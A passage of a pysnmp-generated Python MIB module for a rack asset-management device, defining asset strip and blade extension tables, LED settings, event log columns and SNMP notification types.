assetStripDefaultLEDColorDisconnectedStr = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 6, 1, 1, 18), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: assetStripDefaultLEDColorDisconnectedStr.setStatus('current')
if mibBuilder.loadTexts: assetStripDefaultLEDColorDisconnectedStr.setDescription('Default color of all LEDs (RGB) when no tag is connected during automatic operation; string with 3 hex octets')
assetManagementTable = MibTable((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1), )
if mibBuilder.loadTexts: assetManagementTable.setStatus('current')
if mibBuilder.loadTexts: assetManagementTable.setDescription('A list of asset management entries containing tag information and LED state. The number of entries is given by the value of rackUnitCount.')
assetManagementEntry = MibTableRow((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1), ).setIndexNames((0, "ASSETMANAGEMENT-MIB", "assetStripID"), (0, "ASSETMANAGEMENT-MIB", "rackUnitID"))
if mibBuilder.loadTexts: assetManagementEntry.setStatus('current')
if mibBuilder.loadTexts: assetManagementEntry.setDescription('An entry containing tag information and LED state for a rack unit.')
rackUnitID = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 256)))
if mibBuilder.loadTexts: rackUnitID.setStatus('current')
if mibBuilder.loadTexts: rackUnitID.setDescription('A unique value for each rack unit. Its value ranges between 1 and the value of rackUnitCount.')
ledOperationMode = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 2), AssetManagementLEDOperationModeEnumeration()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ledOperationMode.setStatus('current')
if mibBuilder.loadTexts: ledOperationMode.setDescription('Operation mode of the LED (manual or automatic, based on tag connection).')
ledMode = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 3), AssetManagementLEDModeEnumeration()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ledMode.setStatus('current')
if mibBuilder.loadTexts: ledMode.setDescription('Mode of the LED (on, off, fastBlink,slowBlink). Setting this value automatically switches the ledOperationMode to manual.')
ledColor = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 4), RGBCOLOR()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ledColor.setStatus('current')
if mibBuilder.loadTexts: ledColor.setDescription('Color of the LED (RGB) in binary format. Setting this value automatically switches the ledOperationMode to manual.')
ledColorStr = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ledColorStr.setStatus('current')
if mibBuilder.loadTexts: ledColorStr.setDescription('Color of the LED (RGB) in string format. It contains 3 hex octets for the RGB colors. Setting this value automatically switches the ledOperationMode to manual.')
tagID = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: tagID.setStatus('current')
if mibBuilder.loadTexts: tagID.setDescription('Asset management tag attached to the rack unit. Empty in case there is no tag attached.')
tagFamily = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: tagFamily.setStatus('current')
if mibBuilder.loadTexts: tagFamily.setDescription('Family of the asset management tag attached to the rack unit. Empty in case there is no tag attached.')
rackUnitPosition = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 256))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rackUnitPosition.setStatus('current')
if mibBuilder.loadTexts: rackUnitPosition.setDescription('A number associated with each rack unit. Its value depends on the rack unit numbering mode. It ranges between 1 and the value of rackUnitCount. If the asset strip is disconnected, then the value is 0.')
rackUnitType = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 9), RackUnitTypeEnumeration()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rackUnitType.setStatus('current')
if mibBuilder.loadTexts: rackUnitType.setDescription('Type of the connected tag (single server or blade extension). If the asset strip is disconnected, then the value is unknown. If the asset tag is disconnected, then the value is none.')
bladeExtensionSize = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bladeExtensionSize.setStatus('current')
if mibBuilder.loadTexts: bladeExtensionSize.setDescription('In case a blade extension is connected this returns the number of slots on the extension. If the asset strip is disconnected or no blade is connected, then the value is 0.')
rackUnitName = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 12), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rackUnitName.setStatus('current')
if mibBuilder.loadTexts: rackUnitName.setDescription('Name for a specific rack unit; may be freely chosen.')
assetStripCascadePosition = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 99))).setMaxAccess("readonly")
if mibBuilder.loadTexts: assetStripCascadePosition.setStatus('current')
if mibBuilder.loadTexts: assetStripCascadePosition.setDescription('This is the position of the asset strip in a cascaded chain. Numbered in ascending order starting with the asset strip connected to the device (EMX/PX). For non-cascaded asset strips, value = 1')
rackUnitRelativePosition = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 14), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 99))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rackUnitRelativePosition.setStatus('current')
if mibBuilder.loadTexts: rackUnitRelativePosition.setDescription('This is the relative position of the rackUnit within the assetStrip. For cascaded asset strips such as the AMS-M2-Z and AMS-M3-Z, it is numbered in ascending order starting with the rackunit closest to the asset strip edge with the connector. For non-cascaded asset strips, value = 1')
assetStripNumberOfRackUnits = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 1, 1, 15), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 256))).setMaxAccess("readonly")
if mibBuilder.loadTexts: assetStripNumberOfRackUnits.setStatus('current')
if mibBuilder.loadTexts: assetStripNumberOfRackUnits.setDescription('For non-cascaded asset strips, value = rackUnitCount. For cascaded asset strips, it is the number of rack units in the asset strip. Examples: 2 for AMS-M2-Z, 3 for AMS-M3-Z.')
bladeExtensionTable = MibTable((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 2), )
if mibBuilder.loadTexts: bladeExtensionTable.setStatus('current')
if mibBuilder.loadTexts: bladeExtensionTable.setDescription('A list of blade server extension entries containing tag information.')
bladeExtensionEntry = MibTableRow((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 2, 1), ).setIndexNames((0, "ASSETMANAGEMENT-MIB", "assetStripID"), (0, "ASSETMANAGEMENT-MIB", "rackUnitID"), (0, "ASSETMANAGEMENT-MIB", "bladeSlotID"))
if mibBuilder.loadTexts: bladeExtensionEntry.setStatus('current')
if mibBuilder.loadTexts: bladeExtensionEntry.setDescription('An entry containing tag information for a blade server extension.')
bladeSlotID = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 16)))
if mibBuilder.loadTexts: bladeSlotID.setStatus('current')
if mibBuilder.loadTexts: bladeSlotID.setDescription('A unique value for each slot on a blade extension.')
bladeTagID = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 2, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bladeTagID.setStatus('current')
if mibBuilder.loadTexts: bladeTagID.setDescription('Asset management tag attached to a blade extension at the rack unit. Empty in case there is no tag attached.')
bladeSlotPosition = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 1, 7, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 256))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bladeSlotPosition.setStatus('current')
if mibBuilder.loadTexts: bladeSlotPosition.setDescription('A number associated with each blade slot. It ranges between 1 and the value of bladeExtensionSize.')
logConfiguration = MibIdentifier((1, 3, 6, 1, 4, 1, 13742, 7, 3, 1))
logSize = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 3, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: logSize.setStatus('current')
if mibBuilder.loadTexts: logSize.setDescription('The number of entries in the asset management log table.')
oldestLogID = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 3, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: oldestLogID.setStatus('current')
if mibBuilder.loadTexts: oldestLogID.setDescription('The index of the oldest entry in the log table.')
newestLogID = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 3, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: newestLogID.setStatus('current')
if mibBuilder.loadTexts: newestLogID.setDescription('The index of the newest entry in the log table.')
logEventCount = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 3, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: logEventCount.setStatus('current')
if mibBuilder.loadTexts: logEventCount.setDescription('The total number of logged events.')
assetManagementLogTable = MibTable((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2), )
if mibBuilder.loadTexts: assetManagementLogTable.setStatus('current')
if mibBuilder.loadTexts: assetManagementLogTable.setDescription('A ring buffer containing asset management events.')
assetManagementLogEntry = MibTableRow((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1), ).setIndexNames((0, "ASSETMANAGEMENT-MIB", "logIndex"))
if mibBuilder.loadTexts: assetManagementLogEntry.setStatus('current')
if mibBuilder.loadTexts: assetManagementLogEntry.setDescription('An entry in the asset management log table.')
logIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 5000)))
if mibBuilder.loadTexts: logIndex.setStatus('current')
if mibBuilder.loadTexts: logIndex.setDescription('The index of an entry in the log ring buffer. Its value ranges between 1 and logSize.')
logTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 2), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: logTimeStamp.setStatus('current')
if mibBuilder.loadTexts: logTimeStamp.setDescription('The time of the log entry in seconds relative to January 1, 1970 00:00 UTC.')
logEventType = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 3), LogEventTypeEnumeration()).setMaxAccess("readonly")
if mibBuilder.loadTexts: logEventType.setStatus('current')
if mibBuilder.loadTexts: logEventType.setDescription('The type of this log entry.')
logAssetStripNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 256))).setMaxAccess("readonly")
if mibBuilder.loadTexts: logAssetStripNumber.setStatus('current')
if mibBuilder.loadTexts: logAssetStripNumber.setDescription('A unique value for each asset strip. Its value ranges between 1 and the value of assetStripCount.')
logRackUnitNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 256))).setMaxAccess("readonly")
if mibBuilder.loadTexts: logRackUnitNumber.setStatus('current')
if mibBuilder.loadTexts: logRackUnitNumber.setDescription('A unique value for each rack unit. Its value ranges between 1 and the value of rackUnitCount. It corresponds with rackUnitID, the fixed ordinal index of each rack unit.')
logRackUnitPosition = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 256))).setMaxAccess("readonly")
if mibBuilder.loadTexts: logRackUnitPosition.setStatus('current')
if mibBuilder.loadTexts: logRackUnitPosition.setDescription('A number associated with each rack unit. Its value depends on the rack unit numbering mode. It ranges between 1 and the value of rackUnitCount. If the asset strip is disconnected, then the value is 0.')
logSlotNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: logSlotNumber.setStatus('current')
if mibBuilder.loadTexts: logSlotNumber.setDescription('A unique value for each slot on a blade extension. Value of 0 indicates a tag on the main strip. If the asset strip is disconnected, the value is 0 as well. Use logEventType to distinguish the validity.')
logTagID = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 8), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: logTagID.setStatus('current')
if mibBuilder.loadTexts: logTagID.setDescription('Asset management tag attached to the rack unit. Empty in case there is no tag attached.')
logAssetStripState = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 9), AssetStripStateEnumeration()).setMaxAccess("readonly")
if mibBuilder.loadTexts: logAssetStripState.setStatus('current')
if mibBuilder.loadTexts: logAssetStripState.setDescription('Asset management strip state.')
logParentBladeID = MibTableColumn((1, 3, 6, 1, 4, 1, 13742, 7, 3, 2, 1, 10), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: logParentBladeID.setStatus('current')
if mibBuilder.loadTexts: logParentBladeID.setDescription('In case the tag is attached to a blade extension, this indicates the tagID of the extension. Empty in case there is no tag attached or the tag is attached on the main strip.')
deviceName = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: deviceName.setStatus('current')
if mibBuilder.loadTexts: deviceName.setDescription('The user-defined name for the Device.')
deviceInetAddressType = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 2), InetAddressType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: deviceInetAddressType.setStatus('current')
if mibBuilder.loadTexts: deviceInetAddressType.setDescription('The type of address format')
deviceInetIPAddress = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 3), InetAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: deviceInetIPAddress.setStatus('current')
if mibBuilder.loadTexts: deviceInetIPAddress.setDescription('The current IP address. A value of 0.0.0.0 indicates an error or an unset option.')
assetStripNumber = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 256))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: assetStripNumber.setStatus('current')
if mibBuilder.loadTexts: assetStripNumber.setDescription('A unique value for each asset strip. Its value ranges between 1 and the value of assetStripCount.')
rackUnitNumber = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 256))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: rackUnitNumber.setStatus('current')
if mibBuilder.loadTexts: rackUnitNumber.setDescription('A unique value for each rack unit. Its value ranges between 1 and the value of rackUnitCount. It corresponds with rackUnitID, the fixed ordinal index of each rack unit.')
assetStripFirmwareUpdateState = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 6), AssetStripFirmwareUpdateStateEnumeration()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: assetStripFirmwareUpdateState.setStatus('current')
if mibBuilder.loadTexts: assetStripFirmwareUpdateState.setDescription('The new asset strip firmware update state.')
deviceUserName = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: deviceUserName.setStatus('current')
if mibBuilder.loadTexts: deviceUserName.setDescription('The user currently logged in.')
deviceChangedParameter = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 8), DeviceConfigurationParameterEnumeration()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: deviceChangedParameter.setStatus('current')
if mibBuilder.loadTexts: deviceChangedParameter.setDescription('Description of the parameter(s) that changed. ')
changedParameterNewValue = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 9), DisplayString()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: changedParameterNewValue.setStatus('current')
if mibBuilder.loadTexts: changedParameterNewValue.setDescription('The new value of the changed parameter.')
slotNumber = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: slotNumber.setStatus('current')
if mibBuilder.loadTexts: slotNumber.setDescription('A unique value for each slot on a blade extension. Value of 0 indicates a tag on the main strip.')
oldNumberOfComponentAssetStrips = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: oldNumberOfComponentAssetStrips.setStatus('current')
if mibBuilder.loadTexts: oldNumberOfComponentAssetStrips.setDescription('The old number of components building a composite asset strip.')
agentInetPortNumber = MibScalar((1, 3, 6, 1, 4, 1, 13742, 7, 0, 0, 12), InetPortNumber()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: agentInetPortNumber.setStatus('current')
if mibBuilder.loadTexts: agentInetPortNumber.setDescription('The UDP port number used for accessing the SNMP agent on the device. Examples: If the associated device MIB (PX2-MIB, EMD-MIB) has deviceCascadeType set to portForwarding, then master: 50500 slave 1:50501 slave 2: 50502 ...... If cascading mode is not portForwarding and default (Standard) ports are being used, then port: 161 ')
assetTagConnected = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 1)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "rackUnitNumber"), ("ASSETMANAGEMENT-MIB", "rackUnitPosition"), ("ASSETMANAGEMENT-MIB", "rackUnitName"), ("ASSETMANAGEMENT-MIB", "slotNumber"), ("ASSETMANAGEMENT-MIB", "tagID"), ("ASSETMANAGEMENT-MIB", "bladeTagID"), ("ASSETMANAGEMENT-MIB", "ledColor"), ("ASSETMANAGEMENT-MIB", "ledMode"), ("ASSETMANAGEMENT-MIB", "ledOperationMode"), ("ASSETMANAGEMENT-MIB", "rackUnitCount"), ("ASSETMANAGEMENT-MIB", "assetStripType"), ("ASSETMANAGEMENT-MIB", "assetStripCascadePosition"), ("ASSETMANAGEMENT-MIB", "rackUnitRelativePosition"), ("ASSETMANAGEMENT-MIB", "assetStripNumberOfRackUnits"))
if mibBuilder.loadTexts: assetTagConnected.setStatus('current')
if mibBuilder.loadTexts: assetTagConnected.setDescription('The asset tag of a rack unit was connected. bladeTagID is empty if the asset tag is not on a blade extension.')
assetTagDisconnected = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 2)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "rackUnitNumber"), ("ASSETMANAGEMENT-MIB", "rackUnitPosition"), ("ASSETMANAGEMENT-MIB", "rackUnitName"), ("ASSETMANAGEMENT-MIB", "slotNumber"), ("ASSETMANAGEMENT-MIB", "tagID"), ("ASSETMANAGEMENT-MIB", "bladeTagID"), ("ASSETMANAGEMENT-MIB", "ledColor"), ("ASSETMANAGEMENT-MIB", "ledMode"), ("ASSETMANAGEMENT-MIB", "ledOperationMode"), ("ASSETMANAGEMENT-MIB", "rackUnitCount"), ("ASSETMANAGEMENT-MIB", "assetStripType"), ("ASSETMANAGEMENT-MIB", "assetStripCascadePosition"), ("ASSETMANAGEMENT-MIB", "rackUnitRelativePosition"), ("ASSETMANAGEMENT-MIB", "assetStripNumberOfRackUnits"))
if mibBuilder.loadTexts: assetTagDisconnected.setStatus('current')
if mibBuilder.loadTexts: assetTagDisconnected.setDescription('The asset tag of a rack unit was disconnected. bladeTagID is empty if the asset tag is not on a blade extension.')
assetStripStateChange = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 3)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "assetStripState"), ("ASSETMANAGEMENT-MIB", "rackUnitCount"))
if mibBuilder.loadTexts: assetStripStateChange.setStatus('current')
if mibBuilder.loadTexts: assetStripStateChange.setDescription('The asset strip unit changed its state.')
assetStripFirmwareUpdate = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 4)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "assetStripFirmwareUpdateState"))
if mibBuilder.loadTexts: assetStripFirmwareUpdate.setStatus('current')
if mibBuilder.loadTexts: assetStripFirmwareUpdate.setDescription('Asset strip firmware update state change.')
deviceConfigurationChanged = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 5)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "deviceUserName"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "deviceChangedParameter"), ("ASSETMANAGEMENT-MIB", "changedParameterNewValue"))
if mibBuilder.loadTexts: deviceConfigurationChanged.setStatus('current')
if mibBuilder.loadTexts: deviceConfigurationChanged.setDescription('Assetstrip configuration has changed')
rackUnitConfigurationChanged = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 6)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "deviceUserName"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "rackUnitNumber"), ("ASSETMANAGEMENT-MIB", "rackUnitPosition"), ("ASSETMANAGEMENT-MIB", "rackUnitName"), ("ASSETMANAGEMENT-MIB", "ledColor"), ("ASSETMANAGEMENT-MIB", "ledMode"), ("ASSETMANAGEMENT-MIB", "ledOperationMode"))
if mibBuilder.loadTexts: rackUnitConfigurationChanged.setStatus('current')
if mibBuilder.loadTexts: rackUnitConfigurationChanged.setDescription('Assetstrip configuration has changed')
bladeExtensionConnected = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 7)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "rackUnitNumber"), ("ASSETMANAGEMENT-MIB", "rackUnitPosition"), ("ASSETMANAGEMENT-MIB", "rackUnitName"), ("ASSETMANAGEMENT-MIB", "tagID"), ("ASSETMANAGEMENT-MIB", "bladeExtensionSize"), ("ASSETMANAGEMENT-MIB", "ledColor"), ("ASSETMANAGEMENT-MIB", "ledMode"), ("ASSETMANAGEMENT-MIB", "ledOperationMode"), ("ASSETMANAGEMENT-MIB", "rackUnitCount"), ("ASSETMANAGEMENT-MIB", "assetStripType"), ("ASSETMANAGEMENT-MIB", "assetStripCascadePosition"), ("ASSETMANAGEMENT-MIB", "rackUnitRelativePosition"), ("ASSETMANAGEMENT-MIB", "assetStripNumberOfRackUnits"))
if mibBuilder.loadTexts: bladeExtensionConnected.setStatus('current')
if mibBuilder.loadTexts: bladeExtensionConnected.setDescription('A blade extension has been connected to the rackunit.')
bladeExtensionDisconnected = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 8)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "rackUnitNumber"), ("ASSETMANAGEMENT-MIB", "rackUnitPosition"), ("ASSETMANAGEMENT-MIB", "rackUnitName"), ("ASSETMANAGEMENT-MIB", "tagID"), ("ASSETMANAGEMENT-MIB", "bladeExtensionSize"), ("ASSETMANAGEMENT-MIB", "ledColor"), ("ASSETMANAGEMENT-MIB", "ledMode"), ("ASSETMANAGEMENT-MIB", "ledOperationMode"), ("ASSETMANAGEMENT-MIB", "rackUnitCount"), ("ASSETMANAGEMENT-MIB", "assetStripType"), ("ASSETMANAGEMENT-MIB", "assetStripCascadePosition"), ("ASSETMANAGEMENT-MIB", "rackUnitRelativePosition"), ("ASSETMANAGEMENT-MIB", "assetStripNumberOfRackUnits"))
if mibBuilder.loadTexts: bladeExtensionDisconnected.setStatus('current')
if mibBuilder.loadTexts: bladeExtensionDisconnected.setDescription('A blade extension has been disconnected from the rackunit.')
bladeExtensionOverflowOccured = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 9)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"))
if mibBuilder.loadTexts: bladeExtensionOverflowOccured.setStatus('current')
if mibBuilder.loadTexts: bladeExtensionOverflowOccured.setDescription("Maximum number of supported tags on blade extension was reached. The asset strip won't detect any new tags on blade extensions until some are removed.")
bladeExtensionOverflowCleared = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 10)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"))
if mibBuilder.loadTexts: bladeExtensionOverflowCleared.setStatus('current')
if mibBuilder.loadTexts: bladeExtensionOverflowCleared.setDescription('Free space for new tags on blade extensions is available again.')
